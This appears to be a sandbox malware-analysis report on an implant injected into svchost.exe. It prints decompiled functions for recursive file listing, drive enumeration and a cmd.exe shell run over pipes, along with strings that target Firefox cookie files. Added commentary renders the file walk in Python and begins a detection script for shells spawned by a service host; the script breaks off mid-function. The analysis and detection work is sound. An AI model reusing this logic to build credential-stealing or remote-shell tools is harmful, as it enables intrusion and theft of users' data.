                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$Alloclstrlen$Heap$Process$AddressFreeProcSize$LibraryLoad
                                                            • String ID: AllocateAndGetTcpExTableFromStack$GetExtendedTcpTable$iphlpapi.dll
                                                            • API String ID: 2855280697-4277049092
                                                            • Opcode ID: 7601e0a4b459352a92939cf667a52717564284ce3238fef11a6e4437f7e2914d
                                                            • Instruction ID: cfc59417cf914dfaed5f3172fcc9234655bbc4515034c08987778f523f03dbe5
                                                            • Opcode Fuzzy Hash: 7601e0a4b459352a92939cf667a52717564284ce3238fef11a6e4437f7e2914d
                                                            • Instruction Fuzzy Hash: B8E1A273615B84A6EB26DF99E85C3DA73B1FB88B80F004515DA4A4375AEF3AD449CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FromPointWindow$Message$ChildClientPostScreen$Send
                                                            • String ID: #32768$,$Button
                                                            • API String ID: 2316350196-3823977346
                                                            • Opcode ID: 6165075785d07e49daa80f41fcb39a2dff1203b85361a4e016a5dae74bccd009
                                                            • Instruction ID: e75bb4bdd4fc6ad01eaa5aa47c155746b7627d58347cb883d936f9e4d1599b88
                                                            • Opcode Fuzzy Hash: 6165075785d07e49daa80f41fcb39a2dff1203b85361a4e016a5dae74bccd009
                                                            • Instruction Fuzzy Hash: 21A1C537311A50A6FB798BA9E81C7DA73A0F785BA9F041611DD5A07F9ADF3EC4058700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$FileFindwsprintf$lstrcmp$Directorylstrcpy$AllocateCheckCloseCreateErrorFirstFreeInitializeLastMembershipNextToken$AddressEnvironmentExistsHandleLibraryLoadPathProcProfileUserVariable
                                                            • String ID: %s%s$%s\%s$%s\Profiles\%s$%s\Profiles\%s\cookies.sqlite$USERPROFILE$WTSQueryUserToken$Wtsapi32.dll$\AppData\Roaming\Mozilla\Firefox$\Profiles\*.*$cmd.exe /c start firefox.exe -no-remote -profile "%s"
                                                            • API String ID: 2343920944-4059221782
                                                            • Opcode ID: 93ac44abe063b4776f5dbfbf8dba5039e1362179fbac851d59ba965d3e510170
                                                            • Instruction ID: fbd7a9c1195f29244e59e4cd81c89808c281943e4ef25f493dc4683d5991f7f9
                                                            • Opcode Fuzzy Hash: 93ac44abe063b4776f5dbfbf8dba5039e1362179fbac851d59ba965d3e510170
                                                            • Instruction Fuzzy Hash: 1F611D33604A8AB5EF32DFA5E85C7D973A0F744788F400512D61E4766AEF7AC609C780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 43%
                                                            			E0000022B22BAF535E30(signed long long __rbx, long long __rcx, intOrPtr* __rdx) {
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				void* __rbp;
                                                            				signed int _t88;
                                                            				signed int _t98;
                                                            				void* _t108;
                                                            				signed char _t109;
                                                            				void* _t111;
                                                            				void* _t112;
                                                            				void* _t115;
                                                            				void* _t117;
                                                            				signed long long _t141;
                                                            				long long _t146;
                                                            				intOrPtr _t147;
                                                            				void* _t148;
                                                            				intOrPtr _t150;
                                                            				long long _t151;
                                                            				intOrPtr _t152;
                                                            				signed long long _t155;
                                                            				signed long long _t158;
                                                            				intOrPtr _t161;
                                                            				intOrPtr _t176;
                                                            				void* _t177;
                                                            				long long _t187;
                                                            				intOrPtr _t199;
                                                            				intOrPtr* _t210;
                                                            				long long _t211;
                                                            				intOrPtr _t212;
                                                            				intOrPtr _t214;
                                                            				void* _t215;
                                                            				void* _t216;
                                                            				signed long long _t217;
                                                            				void* _t219;
                                                            				intOrPtr _t226;
                                                            
                                                            				_t155 = __rbx;
                                                            				_t215 = _t216 - 0x9f0;
                                                            				_t217 = _t216 - 0xaf0;
                                                            				_t141 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t215 + 0x9e0) = _t141 ^ _t217;
                                                            				_t210 = __rdx;
                                                            				 *((long long*)(_t217 + 0x38)) = __rcx;
                                                            				_t211 = __rcx;
                                                            				r8d = 0x410;
                                                            				E0000022B22BAF563830(_t108, 0, _t111, _t112, _t215 + 0x5d0, __rdx, __rdx, _t219);
                                                            				lstrlenW(??);
                                                            				_t144 =  ==  ? 0xaf586058 : 0xaf587858;
                                                            				 *((long long*)(_t217 + 0x40)) = 0xaf587858;
                                                            				wsprintfW(??, ??);
                                                            				FindFirstFileW(??, ??);
                                                            				 *((long long*)(_t217 + 0x48)) = 0xaf587858;
                                                            				_t114 = ( ==  ? 0xaf586058 : 0xaf587858) - 0xffffffff;
                                                            				if (( ==  ? 0xaf586058 : 0xaf587858) != 0xffffffff) goto 0xaf535eda;
                                                            				goto 0xaf5361bf;
                                                            				 *((long long*)(_t217 + 0xb20)) = __rbx;
                                                            				 *(_t217 + 0x30) = 1;
                                                            				asm("o16 nop [eax+eax]");
                                                            				_t109 =  *(_t215 - 0x64) & 0x0000ffff;
                                                            				_t115 = _t109 - "."; // 0x2e
                                                            				_t88 =  *(_t215 - 0x62) & 0x0000ffff;
                                                            				if (_t115 != 0) goto 0xaf535f0e;
                                                            				if (_t88 ==  *0xaf587872) goto 0xaf536083;
                                                            				_t117 = _t109 - L".."; // 0x2e
                                                            				if (_t117 != 0) goto 0xaf535f31;
                                                            				if (_t88 !=  *0xaf587876) goto 0xaf535f31;
                                                            				if (( *(_t215 - 0x60) & 0x0000ffff) ==  *0xaf587878) goto 0xaf536083;
                                                            				 *((long long*)(_t217 + 0x20)) = _t215 - 0x64;
                                                            				 *(_t217 + 0x30) = 0;
                                                            				if (( *(_t217 + 0x70) & 0x00000010) == 0) goto 0xaf535f75;
                                                            				wsprintfW(??, ??);
                                                            				E0000022B22BAF535E30(__rbx, _t211, _t215 + 0x1c0);
                                                            				goto 0xaf536083;
                                                            				wsprintfW(??, ??);
                                                            				 *((long long*)(_t217 + 0x68)) = 7;
                                                            				 *(_t217 + 0x60) = _t155;
                                                            				 *((short*)(_t217 + 0x50)) = 0;
                                                            				if ( *((intOrPtr*)(_t215 + 0x1c0)) != 0) goto 0xaf535f9c;
                                                            				goto 0xaf535fba;
                                                            				_t146 = _t215 + 0x1c0;
                                                            				asm("o16 nop [eax+eax]");
                                                            				if ( *((intOrPtr*)(_t146 + ((_t155 | 0xffffffff) + 1) * 2)) != 0) goto 0xaf535fb0;
                                                            				E0000022B22BAF533B50(_t155, _t217 + 0x50, _t215 + 0x1c0, _t211, (_t155 | 0xffffffff) + 1);
                                                            				_t212 =  *((intOrPtr*)(_t211 + 0x18));
                                                            				E0000022B22BAF536940(_t109, _t146, _t155, _t217 + 0x50, _t212, _t212, _t217 + 0x50);
                                                            				_t226 =  *((intOrPtr*)(_t217 + 0x38));
                                                            				_t199 =  *((intOrPtr*)(_t226 + 0x20));
                                                            				if (0x55555554 - _t199 - 1 < 0) goto 0xaf536211;
                                                            				 *((long long*)(_t226 + 0x20)) = _t199 + 1;
                                                            				 *((long long*)(_t212 + 8)) = _t146;
                                                            				 *((long long*)( *((intOrPtr*)(_t146 + 8)))) = _t146;
                                                            				_t147 =  *((intOrPtr*)(_t217 + 0x68));
                                                            				if (_t147 - 8 < 0) goto 0xaf536080;
                                                            				_t176 =  *((intOrPtr*)(_t217 + 0x50));
                                                            				_t148 = _t147 + 1;
                                                            				if (_t148 - 0xffffffff > 0) goto 0xaf5361fe;
                                                            				if (_t148 + _t148 - 0x1000 < 0) goto 0xaf536074;
                                                            				if ((_t109 & 0x0000001f) != 0) goto 0xaf5361f8;
                                                            				_t150 =  *((intOrPtr*)(_t176 - 8));
                                                            				if (_t150 - _t176 >= 0) goto 0xaf5361f2;
                                                            				_t177 = _t176 - _t150;
                                                            				if (_t177 - 8 < 0) goto 0xaf5361ec;
                                                            				if (_t177 - 0x27 > 0) goto 0xaf5361e6;
                                                            				0xaf55a85c();
                                                            				goto 0xaf536083;
                                                            				_t214 = _t226;
                                                            				if (FindNextFileW(??, ??) != 0) goto 0xaf535ef0;
                                                            				FindClose(??);
                                                            				if (( *(_t217 + 0x30) & 0x000000ff) == 0) goto 0xaf5361b5;
                                                            				_t98 = lstrlenW(??);
                                                            				 *((long long*)(_t217 + 0x68)) = 7;
                                                            				 *(_t217 + 0x60) = _t155;
                                                            				 *((short*)(_t217 + 0x50)) = 0;
                                                            				if ( *((short*)(_t210 + _t98 * 2 - 2)) != 0x5c) goto 0xaf536131;
                                                            				if ( *_t210 == 0) goto 0xaf5360ed;
                                                            				if ( *((short*)(_t210 + ((_t155 | 0xffffffff) + 1) * 2)) != 0) goto 0xaf5360e3;
                                                            				E0000022B22BAF533B50((_t155 | 0xffffffff) + 1, _t217 + 0x50, _t210, _t214, (_t155 | 0xffffffff) + 1);
                                                            				_t158 =  *((intOrPtr*)(_t214 + 0x18));
                                                            				E0000022B22BAF536940(_t109, _t150, _t158, _t217 + 0x50, _t158, _t214, _t217 + 0x50);
                                                            				_t151 =  *((intOrPtr*)(_t214 + 0x20));
                                                            				if (0x55555554 - _t151 - 1 >= 0) goto 0xaf536199;
                                                            				goto 0xaf5361d9;
                                                            				if ( *_t210 == 0) goto 0xaf53614a;
                                                            				asm("o16 nop [eax+eax]");
                                                            				_t160 = (_t158 | 0xffffffff) + 1;
                                                            				if ( *((short*)(_t210 + ((_t158 | 0xffffffff) + 1) * 2)) != 0) goto 0xaf536140;
                                                            				E0000022B22BAF533B50((_t158 | 0xffffffff) + 1, _t217 + 0x50, _t210, _t214, (_t158 | 0xffffffff) + 1);
                                                            				r8d = 1;
                                                            				E0000022B22BAF536690((_t158 | 0xffffffff) + 1, _t217 + 0x50, _t214, _t215, _t160);
                                                            				_t161 =  *((intOrPtr*)(_t214 + 0x18));
                                                            				E0000022B22BAF536940(_t109, _t151, _t161, _t217 + 0x50, _t161, _t214, _t217 + 0x50);
                                                            				_t187 = _t151;
                                                            				_t152 =  *((intOrPtr*)(_t214 + 0x20));
                                                            				if (0x55555554 - _t152 - 1 < 0) goto 0xaf536204;
                                                            				 *((long long*)(_t214 + 0x20)) = _t152 + 1;
                                                            				 *((long long*)(_t161 + 8)) = _t187;
                                                            				 *((long long*)( *((intOrPtr*)(_t187 + 8)))) = _t187;
                                                            				E0000022B22BAF5339E0(_t109, _t217 + 0x50);
                                                            				return E0000022B22BAF55A7C0(_t109,  *((intOrPtr*)(_t187 + 8)),  *(_t215 + 0x9e0) ^ _t217);
                                                            			}

                                                            (Instruction addresses for the listing above: 0x22baf535e30 to 0x22baf5361d8, one address per decompiled statement.)

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileFindFirstlstrlenwsprintf
                                                            • String ID: %s%s%s$%s%s*.*$l$list<T> too long
                                                            • API String ID: 4287520746-3350904371
                                                            • Opcode ID: cb5006bc32967d63480be752ba00a68ad03439baceba1ad33795331473b04774
                                                            • Instruction ID: 16680c5fc86d06e3e218184be5409a5f4ea30cd7a68550a896669b96a23b9703
                                                            • Opcode Fuzzy Hash: cb5006bc32967d63480be752ba00a68ad03439baceba1ad33795331473b04774
                                                            • Instruction Fuzzy Hash: 81C16033204A85A1EA329B99E46C3EE77A0F745794F444215DBAE07BEBEF7AC045C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
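The decompiled function E0000022B22BAF535E30 above is a recursive directory walk: it formats `%s%s*.*` from the path, calls FindFirstFileW, skips the `.` and `..` entries (the two 0x2e comparisons), recurses into entries whose attributes have bit 0x10 (FILE_ATTRIBUTE_DIRECTORY) set, appends every other entry to a std::list guarded by the 0x55555554 length check whose failure path is the `list<T> too long` string, and, if the directory contained no real entry, records the directory itself with a trailing backslash (the 0x5c check after FindClose). The Python below is an added rendering of that logic, not the sample's code: it runs over a constructed in-memory tree instead of the Win32 find APIs so it is offline and deterministic, and the names `walk`, `find_entries` and `SAMPLE_TREE` are mine.

```python
"""Readable rendering of the recursive enumeration in E0000022B22BAF535E30.

Added example, not code from the sample. The tree, the helper names and the
FindFirstFile emulation are constructed; the constants are the ones visible
in the decompiled listing.
"""
from typing import Dict, Iterator, List, Optional, Tuple

FILE_ATTRIBUTE_DIRECTORY = 0x10   # bit tested at `& 0x00000010` in the listing
LIST_MAX = 0x55555554             # length guard before each push; failure is "list<T> too long"

# Constructed directory tree: a dict is a directory, None is a file.
Tree = Dict[str, Optional[dict]]


def find_entries(node: Tree) -> Iterator[Tuple[str, int]]:
    """Emulate FindFirstFileW/FindNextFileW on "<dir>\\*.*":
    Windows hands back "." and ".." before the real entries."""
    yield ".", FILE_ATTRIBUTE_DIRECTORY
    yield "..", FILE_ATTRIBUTE_DIRECTORY
    for name, sub in node.items():
        yield name, (FILE_ATTRIBUTE_DIRECTORY if isinstance(sub, dict) else 0)


def push(out: List[str], item: str, limit: int) -> None:
    """std::list push_back with the size guard seen around each insertion."""
    if len(out) + 1 > limit:
        raise OverflowError("list<T> too long")
    out.append(item)


def walk(node: Tree, path: str, out: List[str], limit: int = LIST_MAX) -> List[str]:
    # The ternary on the lstrlenW result picks "" or "\\" so that
    # wsprintfW(L"%s%s*.*") and wsprintfW(L"%s%s%s") join cleanly.
    sep = "" if path.endswith("\\") else "\\"
    is_empty = True                       # byte at [rsp+0x30] set to 1 before the loop
    for name, attrs in find_entries(node):
        if name in (".", ".."):           # skip the two dot entries
            continue
        is_empty = False                  # cleared once a real entry is seen
        child = path + sep + name
        if attrs & FILE_ATTRIBUTE_DIRECTORY:
            walk(node[name], child, out, limit)   # recursive call on the 0x10 branch
        else:
            push(out, child, limit)
    # After FindClose: an empty directory is recorded itself, with a
    # backslash appended when the path does not already end in one (0x5c check).
    if is_empty:
        push(out, path if path.endswith("\\") else path + "\\", limit)
    return out


# Constructed tree modelled on the paths this sample is after.
SAMPLE_TREE: Tree = {
    "Users": {
        "alice": {
            "AppData": {"Roaming": {"Mozilla": {"Firefox": {"Profiles": {
                "k3x9q1.default-release": {"cookies.sqlite": None, "key4.db": None},
            }}}}},
            "Documents": {},              # empty: recorded as "...\Documents\"
        },
    },
    "pagefile.sys": None,
}

if __name__ == "__main__":
    for entry in walk(SAMPLE_TREE, "C:\\", []):
        print(entry)
```

Two details matter for analysts reading the listing: empty directories are collected as entries in their own right, so the resulting list is not purely a file list, and the `list<T> too long` string is the MSVC STL's own guard rather than anything the malware author wrote, which is why it appears next to the Win32 find APIs in the String ID above.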

                                                            C-Code - Quality: 44%
                                                            			E0000022B22BAF535280(void* __edi, long long __rbx, long long __rcx, long long __rsi, void* __r9, long long __r12) {
                                                            				void* __rdi;
                                                            				int _t105;
                                                            				void* _t137;
                                                            				void* _t139;
                                                            				signed long long _t147;
                                                            				signed long long _t148;
                                                            				signed long long _t149;
                                                            				signed short* _t163;
                                                            				WCHAR* _t193;
                                                            				signed short* _t194;
                                                            				unsigned long long _t200;
                                                            				WCHAR* _t202;
                                                            				void* _t203;
                                                            				void* _t205;
                                                            				signed long long _t206;
                                                            				void* _t208;
                                                            				void* _t216;
                                                            				WCHAR* _t220;
                                                            				long _t224;
                                                            				int _t228;
                                                            				signed long long _t229;
                                                            
                                                            				_t216 = __r9;
                                                            				_t135 = __edi;
                                                            				 *((long long*)(_t205 + 0x18)) = __rbx;
                                                            				 *((long long*)(_t205 + 0x20)) = __rsi;
                                                            				_t203 = _t205 - 0xa50;
                                                            				_t206 = _t205 - 0xb50;
                                                            				_t147 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t148 = _t147 ^ _t206;
                                                            				 *(_t203 + 0xa40) = _t148;
                                                            				 *((long long*)(_t206 + 0x50)) = __rcx;
                                                            				LocalAlloc(_t228);
                                                            				_t229 = _t148;
                                                            				 *_t148 = 0x68;
                                                            				GetLogicalDriveStringsW(_t224);
                                                            				r14d = 0;
                                                            				_t194 = _t203 + 0x630;
                                                            				 *(_t206 + 0x40) = _t224;
                                                            				 *(_t206 + 0x48) = _t224;
                                                            				_t10 = _t224 + 1; // 0x1
                                                            				if ( *((intOrPtr*)(_t203 + 0x630)) == r14w) goto 0xaf535464;
                                                            				 *((long long*)(_t206 + 0xb88)) = __r12;
                                                            				r8d = 0x410;
                                                            				E0000022B22BAF563830(0x208, 0, __edi, _t139, _t203 + 0x220, _t203 + 0x630, _t194, _t208);
                                                            				 *((intOrPtr*)(_t206 + 0x38)) = 0x208;
                                                            				_t149 = _t203 + 0x220;
                                                            				 *(_t206 + 0x30) = _t149;
                                                            				r9d = 0;
                                                            				 *(_t206 + 0x28) = _t224;
                                                            				r8d = 0;
                                                            				 *(_t206 + 0x20) = _t224;
                                                            				GetVolumeInformationW(??, ??, ??, ??, ??, ??, ??, ??);
                                                            				r9d = 0x2b8;
                                                            				 *(_t206 + 0x20) = 0x410;
                                                            				SHGetFileInfoW(??, ??, ??, ??, ??);
                                                            				lstrlenW(_t220);
                                                            				r12d = 2 + _t149 * 2;
                                                            				lstrlenW(_t193);
                                                            				r13d = 2 + _t149 * 2;
                                                            				if (( *_t194 & 0x0000ffff) - 0x41 - 1 <= 0) goto 0xaf5353d9;
                                                            				r9d = 0;
                                                            				if (GetDiskFreeSpaceExW(??, ??, ??, ??) == 0) goto 0xaf5353d9;
                                                            				_t200 =  *(_t206 + 0x40) >> 0x14;
                                                            				goto 0xaf5353dc;
                                                            				 *((short*)(_t194 + _t229)) =  *_t194 & 0x0000ffff;
                                                            				 *((char*)(__rbx + _t229)) = GetDriveTypeW(_t202);
                                                            				 *((intOrPtr*)(__rbx + _t229)) = r14d;
                                                            				 *((intOrPtr*)(__rbx + _t229)) = r14d;
                                                            				E0000022B22BAF562BA0(_t10 + 0xe, __edi, r14d, _t139, _t194 + _t229, _t203 + 0x178, _t194, _t200, r12d);
                                                            				E0000022B22BAF562BA0(_t10 + 0xe + r12d, __edi, r14d, _t139, _t194 + _t229 + _t229, _t203 + 0x220, _t194, _t200, r13d);
                                                            				_t163 = _t194;
                                                            				lstrlenW(??);
                                                            				r14d = 0;
                                                            				if (_t194[_t149] != 0) goto 0xaf535310;
                                                            				r9d = 0;
                                                            				_t44 =  &(_t163[8]); // 0x10
                                                            				r8d = _t44;
                                                            				 *((short*)(_t149 + _t229)) = 0;
                                                            				__imp__SHGetSpecialFolderPathW();
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t10 + 0xe + r12d + r13d + 2, __edi, r14d, _t139, _t203 + 0x220 + _t229, _t203 + 0x220,  &(_t194[_t149]), _t200, 2 + _t149 * 2);
                                                            				lstrlenW(??);
                                                            				r9d = 0;
                                                            				_t54 = _t216 + 5; // 0x5
                                                            				r8d = _t54;
                                                            				__imp__SHGetSpecialFolderPathW();
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(__rbx + _t149 * 2 + 2, __edi, r14d, _t139, _t203 + 0x220 + _t229, _t203 + 0x220,  &(_t194[_t149]), _t200, 2 + _t149 * 2);
                                                            				lstrlenW(??);
                                                            				_t137 = __rbx + _t149 * 2;
                                                            				E0000022B22BAF5350A0();
                                                            				if (_t149 == 0) goto 0xaf535583;
                                                            				LocalSize(??);
                                                            				LocalSize(??);
                                                            				if (_t149 + _t200 - _t149 <= 0) goto 0xaf535557;
                                                            				LocalSize(??);
                                                            				r8d = 0x42;
                                                            				LocalReAlloc(??, ??, ??);
                                                            				LocalSize(??);
                                                            				E0000022B22BAF562BA0(__rbx + _t149 * 2 + 2, _t135, _t137, _t139, _t200 + _t149, _t149, _t149, _t200, _t149);
                                                            				_t105 = LocalSize(??);
                                                            				LocalFree(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t137 + _t105;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)( *((intOrPtr*)(_t206 + 0x50)) + 8)), _t149);
                                                            				LocalFree(??);
                                                            				return E0000022B22BAF55A7C0(__rbx + _t149 * 2 + 2, _t149,  *(_t203 + 0xa40) ^ _t206);
                                                            			}
                                                            Instruction addresses (column detached from the decompiled lines above): 0x22baf535280 to 0x22baf5355cc

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$lstrlen$Size$Free$AllocDriveFolderPathSpecial$DiskFileInfoInformationLogicalSpaceStringsTypeVolume
                                                            • String ID:
                                                            • API String ID: 4186219405-0
                                                            • Opcode ID: ab48fd9bffc54164dd25080b0ed543683e0287214035ea578af6fd1b64da1c0b
                                                            • Instruction ID: 1bcd3786420208402ce04b02540f4a18de1acde09a49fad99d707a7b027a8ccf
                                                            • Opcode Fuzzy Hash: ab48fd9bffc54164dd25080b0ed543683e0287214035ea578af6fd1b64da1c0b
                                                            • Instruction Fuzzy Hash: 13916473210A85A6EF31DFA5E89C7ED73A1F788B88F804415DA4A47B5ADF3AC509C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 39%
                                                            			E0000022B22BAF546DD0(long long __rbx, long long __rcx, long long __rdx, long long __rsi, void* __r9) {
                                                            				void* __rdi;
                                                            				void* _t109;
                                                            				void* _t110;
                                                            				signed long long _t119;
                                                            				long long _t124;
                                                            				long long _t128;
                                                            				long long _t131;
                                                            				HANDLE* _t160;
                                                            				void* _t164;
                                                            				void* _t165;
                                                            				void* _t167;
                                                            				signed long long _t168;
                                                            				void* _t170;
                                                            				HANDLE* _t179;
                                                            				int _t181;
                                                            				struct _SECURITY_ATTRIBUTES* _t183;
                                                            
                                                            				 *((long long*)(_t167 + 0x10)) = __rbx;
                                                            				 *((long long*)(_t167 + 0x18)) = __rsi;
                                                            				_t165 = _t167 - 0x220;
                                                            				_t168 = _t167 - 0x320;
                                                            				_t119 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t165 + 0x210) = _t119 ^ _t168;
                                                            				 *((long long*)(__rcx + 8)) = __rdx;
                                                            				 *((long long*)(__rcx)) = 0xaf588cf8;
                                                            				r9d = 0;
                                                            				 *((long long*)(__rdx + 0x68)) = __rcx;
                                                            				_t131 = __rcx;
                                                            				r8d = 0;
                                                            				CreateEventW(_t183, _t181);
                                                            				 *((long long*)(__rcx + 0x10)) = 0xaf588cf8;
                                                            				r12d = 0;
                                                            				 *((intOrPtr*)(_t165 - 0x70)) = r12d;
                                                            				 *((long long*)(__rcx)) = 0xaf589480;
                                                            				 *((long long*)(_t165 - 0x80)) = 0xaf589480;
                                                            				r8d = L"%04d-%02d-%02d  %02d:%02d";
                                                            				E0000022B22BAF563830(0, 0, _t109, _t110, _t165 - 0x68, __rdx, _t160, _t170);
                                                            				 *(_t168 + 0x58) = _t179;
                                                            				 *((long long*)(_t168 + 0x60)) = 0xaf589480;
                                                            				r8d = 0x208;
                                                            				 *((long long*)(_t168 + 0x68)) = 0xaf589480;
                                                            				E0000022B22BAF563830(0, 0, _t109, _t110, _t165, __rdx, _t160, _t170);
                                                            				r9d = 0;
                                                            				 *(_t131 + 0x18) = _t179;
                                                            				 *(_t131 + 0x20) = _t179;
                                                            				 *(_t131 + 0x28) = _t179;
                                                            				 *(_t131 + 0x30) = _t179;
                                                            				 *((intOrPtr*)(_t168 + 0x70)) = 0x18;
                                                            				 *(_t168 + 0x78) = _t179;
                                                            				 *((intOrPtr*)(_t165 - 0x80)) = 1;
                                                            				if (CreatePipe(_t179, _t160) != 0) goto 0xaf546eda;
                                                            				if ( *(_t131 + 0x18) == 0) goto 0xaf546ec2;
                                                            				CloseHandle(_t164);
                                                            				if ( *(_t131 + 0x30) == 0) goto 0xaf54706f;
                                                            				CloseHandle(??);
                                                            				goto 0xaf54706f;
                                                            				r9d = 0;
                                                            				_t157 = _t131 + 0x20;
                                                            				if (CreatePipe(??, ??, ??, ??) != 0) goto 0xaf546f1b;
                                                            				if ( *(_t131 + 0x20) == 0) goto 0xaf546f03;
                                                            				CloseHandle(??);
                                                            				if ( *(_t131 + 0x28) == 0) goto 0xaf54706f;
                                                            				CloseHandle(??);
                                                            				goto 0xaf54706f;
                                                            				_t34 = _t157 + 0x68; // 0x68
                                                            				r8d = _t34;
                                                            				E0000022B22BAF563830(0, 0, _t109, _t110, _t165 - 0x70, _t131 + 0x20, _t160, _t168 + 0x70);
                                                            				 *(_t168 + 0x58) = 0xaf589480;
                                                            				 *((long long*)(_t168 + 0x60)) = 0xaf589480;
                                                            				 *((long long*)(_t168 + 0x68)) = 0xaf589480;
                                                            				GetStartupInfoW(??);
                                                            				 *((long long*)(_t165 - 0x20)) =  *(_t131 + 0x28);
                                                            				_t124 =  *(_t131 + 0x30);
                                                            				 *((long long*)(_t165 - 0x10)) = _t124;
                                                            				 *((long long*)(_t165 - 0x18)) = _t124;
                                                            				 *((intOrPtr*)(_t165 - 0x70)) = 0x68;
                                                            				 *((intOrPtr*)(_t165 - 0x30)) = r12w;
                                                            				 *((intOrPtr*)(_t165 - 0x34)) = 0x101;
                                                            				GetSystemDirectoryW(??, ??);
                                                            				lstrcatW(??, ??);
                                                            				r9d = 0;
                                                            				 *((long long*)(_t168 + 0x48)) = _t168 + 0x58;
                                                            				r8d = 0;
                                                            				 *((long long*)(_t168 + 0x40)) = _t165 - 0x70;
                                                            				 *(_t168 + 0x38) = _t179;
                                                            				 *(_t168 + 0x30) = _t179;
                                                            				 *((intOrPtr*)(_t168 + 0x28)) = 0x20;
                                                            				 *((intOrPtr*)(_t168 + 0x20)) = 1;
                                                            				if (CreateProcessW(??, ??, ??, ??, ??, ??, ??, ??, ??, ??) != 0) goto 0xaf546ff9;
                                                            				CloseHandle(??);
                                                            				CloseHandle(??);
                                                            				CloseHandle(??);
                                                            				CloseHandle(??);
                                                            				goto 0xaf54706f;
                                                            				r9b = 0x3f;
                                                            				 *((long long*)(_t131 + 0x38)) =  *(_t168 + 0x58);
                                                            				r8d = 1;
                                                            				_t128 =  *((intOrPtr*)(_t168 + 0x60));
                                                            				 *((long long*)(_t131 + 0x40)) = _t128;
                                                            				 *((char*)(_t168 + 0x50)) = 0x85;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t131 + 8)), _t168 + 0x50);
                                                            				WaitForSingleObject(??, ??);
                                                            				Sleep(??);
                                                            				 *(_t168 + 0x30) = r12b;
                                                            				E0000022B22BAF548B70(_t128, 0xaf5472e0, _t131);
                                                            				 *((long long*)(_t131 + 0x48)) = _t128;
                                                            				 *(_t168 + 0x30) = r12b;
                                                            				E0000022B22BAF548B70(_t128, 0xaf547470, _t131);
                                                            				 *((long long*)(_t131 + 0x50)) = _t128;
                                                            				return E0000022B22BAF55A7C0(0x96, _t131,  *(_t165 + 0x210) ^ _t168);
                                                            			}
                                                            Instruction addresses (column detached from the decompiled lines above): 0x22baf546dd0 to 0x22baf54709c

Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: CloseHandle$Create$Pipe$DirectoryEventInfoObjectProcessSingleSleepStartupSystemWaitlstrcat
• String ID: $\cmd.exe
• API String ID: 3838570663-3339350558
• Opcode ID: 83e81d93035937cea476c7aaffe6999df18068edc36231145744d86170da8540
• Instruction ID: 5c8a653a58802fa4a8436363641d90a8125f7166db583317100f6a45abae561d
• Opcode Fuzzy Hash: 83e81d93035937cea476c7aaffe6999df18068edc36231145744d86170da8540
• Instruction Fuzzy Hash: D5815833611B84A6EB61CFA1E85C6CE77B4FB88B48F500125DA8D43B6ADF3AC555C740
Uniqueness
• Uniqueness Score: -1.00%
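Added example, not part of the Joe Sandbox report and not code from the sample: the summary above pairs CreatePipe, CreateProcess and WaitForSingleObject with the string \cmd.exe inside the svchost.exe snapshot, that is, an injected service host running a command shell over anonymous pipes. The script below is the matching detection over process-creation telemetry: it flags a command shell whose parent is a service host, extracts the -k service group of that parent, and notes whether the parent even lives in a system directory (a masquerading copy would not). The event records are constructed in the style of Sysmon Event ID 1; the field names, PIDs and paths are assumptions, not data from the analysis.

```python
"""Detect command shells spawned by a Windows service host (svchost.exe).

Added example for the report's CreatePipe/CreateProcess/"\\cmd.exe" routine.
Event records below are constructed, Sysmon Event ID 1 style; nothing here is
taken from the analysed sample.
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    command_line: str
    parent_pid: int
    parent_image: str
    parent_command_line: str


SHELLS = {"cmd.exe"}                       # the only shell name the listing shows
SERVICE_HOSTS = {"svchost.exe"}
LEGIT_HOST_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
GROUP_RE = re.compile(r"-k\s+(\S+)", re.IGNORECASE)


def _base(path):
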